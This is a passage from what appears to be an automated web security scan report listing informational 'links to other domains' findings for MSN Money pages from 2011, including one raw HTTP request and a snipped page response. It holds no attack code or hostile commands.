Path:	//

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted//?4ae1b

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://money.bundle.com/article/study-women-aim-lower-get-paid-less
http://money.bundle.com/articles/politics-and-market/
http://money.bundle.com/articles/smart-spending/
http://money.bundle.com/articles/your-money/
http://money.bundle.com/categories/
http://money.bundle.com/category/NFCC-ask-debt-expert/
http://money.bundle.com/category/market-talk/
http://money.bundle.com/category/women-in-red/
http://msn.careerbuilder.com/Article/MSN-2461-Job-Info-and-Trends-I-cant-believe-I-get-paid-to-do-this/?SiteId=cbmsnmn42461&sc_extcmp=JS_2461_money
http://msn.careerbuilder.com/Article/MSN-2477-Career-Growth-and-Change-Career-catch-22-How-do-you-get-experience-if-nobody-will-hire-you-without-any/?SiteId=cbmsnmn42477&sc_extcmp=JS_2477_money
http://msn.careerbuilder.com/Article/MSN-2480-Workplace-Issues-Lets-do-lunch-Why-a-midday-break-may-make-you-a-better-employee/?SiteId=cbmsnmn42480&sc_extcmp=JS_2480_money
http://msn.careerbuilder.com/Article/MSN-2481-Cover-Letters-Resumes-How-to-personalize-your-cover-letter-and-get-the-hiring-managers-attention/?SiteId=cbmsnmn42481&sc_extcmp=JS_2481_money
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&sc_extcmp=JS_2482_money
http://msn.careerbuilder.com/Article/MSN-2484-Salaries-Promotions-What-popular-TV-can-teach-you-about-professional-success/?SiteId=cbmsnmn42484&sc_extcmp=JS_2484_money
http://msn.careerbuilder.com/Article/MSN-2486-Leadership-Management-How-not-to-motivate-employees-10-management-habits-to-break-now/?SiteId=cbmsnmn42486&sc_extcmp=JS_2486_money
http://msn.careerbuilder.com/Article/MSN-2487-Leadership-Management-10-tips-for-managing-the-Facebook-generation/?SiteId=cbmsnmn42487&sc_extcmp=JS_2487_money
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296392203&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2F%3F4ae1b&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&resize=false

Request

Response

22.173. http://money.redacted// previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	//

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted//?4ae1b

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://money.bundle.com/article/study-women-aim-lower-get-paid-less
http://money.bundle.com/articles/politics-and-market/
http://money.bundle.com/articles/smart-spending/
http://money.bundle.com/articles/your-money/
http://money.bundle.com/categories/
http://money.bundle.com/category/NFCC-ask-debt-expert/
http://money.bundle.com/category/market-talk/
http://money.bundle.com/category/women-in-red/
http://msn.careerbuilder.com/Article/MSN-2461-Job-Info-and-Trends-I-cant-believe-I-get-paid-to-do-this/?SiteId=cbmsnmn42461&sc_extcmp=JS_2461_money
http://msn.careerbuilder.com/Article/MSN-2477-Career-Growth-and-Change-Career-catch-22-How-do-you-get-experience-if-nobody-will-hire-you-without-any/?SiteId=cbmsnmn42477&sc_extcmp=JS_2477_money
http://msn.careerbuilder.com/Article/MSN-2480-Workplace-Issues-Lets-do-lunch-Why-a-midday-break-may-make-you-a-better-employee/?SiteId=cbmsnmn42480&sc_extcmp=JS_2480_money
http://msn.careerbuilder.com/Article/MSN-2481-Cover-Letters-Resumes-How-to-personalize-your-cover-letter-and-get-the-hiring-managers-attention/?SiteId=cbmsnmn42481&sc_extcmp=JS_2481_money
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnmn42482&sc_extcmp=JS_2482_money
http://msn.careerbuilder.com/Article/MSN-2484-Salaries-Promotions-What-popular-TV-can-teach-you-about-professional-success/?SiteId=cbmsnmn42484&sc_extcmp=JS_2484_money
http://msn.careerbuilder.com/Article/MSN-2486-Leadership-Management-How-not-to-motivate-employees-10-management-habits-to-break-now/?SiteId=cbmsnmn42486&sc_extcmp=JS_2486_money
http://msn.careerbuilder.com/Article/MSN-2487-Leadership-Management-10-tips-for-managing-the-Facebook-generation/?SiteId=cbmsnmn42487&sc_extcmp=JS_2487_money
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=history+of+the+gold+standard&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296400095&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2F%3F4ae1b&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=abfFFnGL&resize=false

Request

Response

22.174. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3
http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3
http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY
http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY
http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3
http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3
http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY
http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY
http://www.bing.com/search?q=what+is+gap+insurance&form=money3
http://www.bing.com/search?q=what+is+sr22+insurance&form=money3
http://www.bing.com/search?q=zodiac+calendar&form=MSMONY
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.carinsurance.com/
http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx
http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx
http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.insure.com/
http://www.insure.com/car-insurance/driver-distractions.html
http://www.insure.com/car-insurance/policy-save.html
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410174&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM07
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 17:56:14 GMT
Content-Length: 149556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410174&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fauto-insurance%2Farticle.aspx%3Fpost%3D7e2e7469-2f32-4c49-a3c2-54bda9bb436b%26GT1%3D33004&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<i> comes from Barbara Marquand at <a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/">CarInsurance.com</a>
...[SNIP]...
<p><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><img src="http://media.social.s-redacted/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif" alt="CarInsurance.com on MSN Money" class="imagefloatright userImage lead" /></a>In the wake of recent news that the <a href="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY" title="http://www.bing.com/search?q=zodiac+calendar&form=MSMONY">zodiac calendar</a> requires updating, <a href="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY" title="http://www.bing.com/search?q=allstate+insurance&FORM=MSMONY">Allstate Insurance</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY" title="http://www.bing.com/search?q=Virgo+Horoscope&FORM=MSMONY">Virgos</a>
...[SNIP]...
<p>People born under the sign were almost seven times more likely to be in a car accident last year when compared to <a href="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=scorpio+Horoscope&form=MSMONY">Scorpios</a>
...[SNIP]...
<p>The "new" sign, <a href="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY" title="http://www.bing.com/search?q=Ophiuchus+Horoscope&form=MSMONY">Ophiuchus</a>
...[SNIP]...
</b><a href="http://www.carinsurance.com/" title="http://www.carinsurance.com/"><b>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx" title="http://www.carinsurance.com/Articles/auto-insurance-companies-stand-out.aspx">Auto insurance companies try to stand out from the crowd</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx" title="http://www.carinsurance.com/Articles/five-most-dangerous-cars.aspx">The 5 most dangerous cars around</a>
...[SNIP]...
<li><a href="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx" title="http://www.carinsurance.com/Articles/cars-that-attract-ladies.aspx">Cars that attract the ladies</a>
...[SNIP]...
);" href="http://money.msn.com/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
ef="http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X0d9z5coaqCKBpjumajGaPp3wO_VSu4YR?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XEdI4lPH5YXQoFdzX6dolUuJi4zgESkkx?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X_8ey5stO4VZuowOF1vLLqcSOHTm1zM-b?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&domain=en-US">tyler coghill</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mNepHp8dR3BaNz273vmz1qC7k6Dr5UxqZumLTSkdmN_tUOubTVlnmMKrArPgUcaisLvPkNqvfzjWEn0neZZmWqw" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGF82iL2owd0niRqXndlsObUL4TDaFSUS?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Jason Halliburton
..(xBWOMPx)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1mviPxdqnTcFn7a679zN5TVH1DDZxWNbV6WUNG3lxcobNMaiLBTOorg0uNGOOxD8cwRpSBxTa-v1hTG9p826dosA" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XjEOTPvlDhopN8tJV9ggDXge6VoBpROKr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XDDuwokFY_SngegAzwydGUhlRy0U6SVbz?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XSJ_NuxgD9S-NsAGt9iez06YT1T3z4bIy?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XxUooOtG0aQGn7lmyRZ521lfgFNbwT85r?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XrMHqap29l6sPXPOau00RiJSjNjxfDcg2?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVAn9safTFrPEMR0pgIqDmO_jTEmXlT_g?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Barbara Searles Labelle
..(law abiding631)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XbSfkbl2R0BF4ZqaDkpm7f95iLMWvx8bJ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Someone
..(wishful45)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US">Malcolm Walker
..(gridnight)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US"><img alt="avatar" src="http://byfiles.storage.redacted/y1m0FdnXk-Vjv78jlRgRJo9T1sIoZzPSsi5ODGnPoiX1tRqiM-j-cc9RSyn230Rb5ItlC4mQYzpf0i3HojYGwGR0Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfJjjOLLsjhdTb4kuGZBLAKdqdVvOwtuc?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsnDaHHPT68CsmSvtVijsfPyAWKHkeltN?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X3e-um2PQYYhgl12G1OQaJcxxr5hEWRbg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
<div style="float:right;margin-left:100px" class="provided-by-insure"><a href="http://www.insure.com"><img src="http://moneycentral.redacted/content/data/partner-tools/auto-insurance-quotes_insure-logo.jpg" width="179" height="15" alt="insure" />
...[SNIP]...
<div class="insure-link" style="margin-right:20px; margin-top:-2px;"><a href="http://www.insure.com">Car insurance quotes</a>
...[SNIP]...
<li class="first"><a href="http://www.insure.com/car-insurance/policy-save.html"> How to save money on car insurance</a>
...[SNIP]...
<li><a href="http://www.insure.com/car-insurance/driver-distractions.html"> 10 most dangerous foods to eat while driving</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Does+car+insurance+lower+at+a+certain+age&form=money3">Do car insurance rates fall at a certain age?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Does+auto+insurance+cover+the+car+or+the+person&form=money3">Does car insurance cover the car or the person?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+happens+if+I+have+an+accident+and+no+car+insurance%3F&form=money3">What happens if I have an accident and no car insurance?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=What+car+is+considered+high+risk+on+auto+insurance&form=money3">What cars are considered high risk?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+sr22+insurance&form=money3">What is an SR-22 policy?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=what+is+gap+insurance&form=money3">What is gap insurance?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.175. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/auto-insurance/article.aspx?post=7e2e7469-2f32-4c49-a3c2-54bda9bb436b&GT1=33004

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/down_normal.gif
http://blu.stc.s-redacted/br/scp/css/15/decoration/toolbar/rating/up_normal.gif
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://cid-62a22a6dc88d7132.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-65309922ddd6d53b.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-8d30c9ab59419904.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-a842a8a81ab60686.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-d57746aa4764d3c8.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://cid-e207b0329a76e0ad.profile.live.com/msn/posts?mkt=en-US&domain=en-US
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://media.social.s-msn.com/images/blogs/00120065-0000-0000-0000-000000000000_00000065-075e-0000-0000-000000000000_20110128210926_carinsurance.com-logo.gif
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
